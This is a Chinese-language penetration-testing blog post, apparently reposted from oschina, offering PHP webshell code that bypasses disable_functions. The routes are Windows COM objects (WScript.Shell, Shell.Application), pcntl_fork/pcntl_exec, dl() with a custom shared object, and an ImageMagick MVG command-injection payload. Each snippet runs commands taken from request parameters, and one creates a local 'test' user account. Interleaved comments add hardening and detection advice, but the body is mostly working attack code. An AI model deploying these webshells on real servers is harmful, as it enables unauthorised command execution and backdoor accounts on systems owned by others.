在渗透测试过程中经常会遇到上传webshell后,由于php.ini配置禁用了一些如exec(),shell_exec(),system()等执行系统命令的函数,导致无法执行系统命令,就此问题给出几种绕过方法。
话不多说,直接贴代码:

```php
<?php $phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!"); $exec=$phpwsh->exec("cmd.exe /c ".$_GET['c'].""); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?>
<?php
··· ···
// Linux variant: the `x` request parameter is written into a bash script at
// /tmp/exec, which is then started via pcntl_fork() + pcntl_exec(). pcntl_*
// are separate functions, so a disable_functions list naming only
// exec/shell_exec/system does not stop them.
// Hardening: the pcntl extension is intended for the CLI — do not load it in
// the web SAPI, or add pcntl_exec and pcntl_fork to disable_functions; a
// restrictive open_basedir also prevents the write to /tmp.
// Forensic artifacts: /tmp/exec (mode 0777) and /tmp/output.txt are left on
// disk after the request.
header("Content-Type: text/plain");
$cmd="/tmp/exec";
@unlink($cmd);
// `$_GET[x]` uses an unquoted key; on PHP 8 an undefined constant is an Error,
// so this snippet presumably only runs on older releases — unverified here.
$c = "#!/usr/bin/env bash\n".$_GET[x]."> /tmp/output.txt\n";
file_put_contents($cmd, $c);
chmod($cmd, 0777);
$cd="/tmp/output.txt";
// Reads the output file before the fork below, i.e. whatever was there from
// an earlier run.
print_r(file_get_contents($cd));
switch (pcntl_fork()) {
    case 0:
        // Child: replace the process image with the script.
        $ret = pcntl_exec($cmd);
        exit("case 0");
    default:
        // Parent (or fork failure, -1): just respond.
        echo "case 1";
        break;
}
··· ···
<?php
// Windows COM Shell.Application::ShellExecute launches an arbitrary program —
// here net.exe, which creates a local user "test". Same disable_functions gap
// as the WScript.Shell variant. Detection: PHP worker → net.exe/cmd.exe child
// process, and unexpected local-account creation events.
// The die() text still says "Wscript.Shell" (copy-paste leftover).
$phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->ShellExecute("net"," user test test /add");
//$exec=$phpwsh->ShellExecute("cmd","/c net user test test /add");
?>
```

```php
<?php
// Windows COM Shell.Application::Open on cmd.exe: spawns a cmd.exe process
// under the web server's account. No command is passed here; it demonstrates
// that the COM route is not covered by disable_functions.
// Hardening: do not load php_com_dotnet on web-facing PHP.
// The die() text still says "Wscript.Shell" (copy-paste leftover).
$phpwsh=new COM("Shell.Application") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->open("c:\\windows\\system32\\cmd.exe");
?>
```

```php
<?php
// Windows COM: resolve the System32 folder as a shell namespace, pick the
// cmd.exe item and invoke its default verb — i.e. launch it. Again a COM
// method call, outside the reach of disable_functions.
// Note: in the double-quoted string, \W and \S are not PHP escape sequences,
// so the backslashes are kept literally.
$a=new COM("Shell.Application");
$a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverb();
?>
```

```php
<?php
// Same as the invokeverb() variant, using the InvokeVerbEx method of the
// shell item instead. Hardening and detection are identical: do not load
// php_com_dotnet on web-facing PHP; watch for PHP workers spawning cmd.exe.
$a=new COM("Shell.Application");
$a->NameSpace("C:\Windows\System32")->Items()->item("cmd.exe")->invokeverbEx();
?>
```

```php
<?php
// POST-parameter version of the WScript.Shell snippet above (Windows,
// php_com_dotnet). Same disable_functions gap, same hardening.
// `$_POST[a]` uses an unquoted key — an Error on PHP 8, a warning before.
$command=$_POST[a];
$wsh = new COM('WScript.shell'); // create a COM object
$exec = $wsh->exec('cmd.exe /c '.$command); // call the object's method to run the command
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
// Closing tag implies the final semicolon.
echo $stroutput ?>
```

```php
<?php
// Loads an attacker-supplied shared object through dl(); the extension then
// provides its own function (confirm_dl_compiled — the name matches the stub
// PHP's ext_skel generates, presumably reused by the author) that runs the
// `a` parameter. Native code bypasses any PHP-level function blacklist.
// Hardening: enable_dl=Off, add dl to disable_functions, and keep
// extension_dir non-writable by the web user (dl() is also unavailable in most
// web SAPIs; verify for the SAPI in use).
dl("dl.so"); // dl.so lives in extension_dir; if not, the author uses a ../../ relative path to reach it
confirm_dl_compiled("$_GET[a]>1.txt");
?>
```

```php
<?php
// Imagick route: an MVG file whose fill URL ends in `|$command` abuses an old
// ImageMagick delegate/filename-handling flaw, so the command runs inside
// ImageMagick rather than PHP — disable_functions never sees it.
// Hardening: current ImageMagick releases reject this; additionally restrict
// the MVG/URL/HTTPS coders in ImageMagick's policy.xml and do not let
// untrusted input reach Imagick.
// Works from the CLI (argv[1]) or the web (`cmd` parameter); defaults to `id`.
echo "Disable Functions: " . ini_get('disable_functions') . "\n";
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') { $command = 'id'; }
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;
// Artifacts: KKKK.mvg and KKKK.png in the working directory. If readImage()
// throws, the unlink() calls below never run and KKKK.mvg stays on disk.
file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage('KKKK.mvg');
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>
```

```php
<?php
// Fileless variant of the Imagick snippet above: the MVG document is fed to
// readImageBlob() directly, so no KKKK.* files are written. Same underlying
// ImageMagick flaw and the same policy.xml / upgrade mitigation.
// `c` comes from $_REQUEST, i.e. GET, POST or cookie.
$c=$_REQUEST['c'];
$e = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|$c")'
pop graphic-context
EOF;
$i = new Imagick();
$i->readImageBlob($e);
?>
```
来源:oschina
链接:https://my.oschina.net/u/4380991/blog/3359172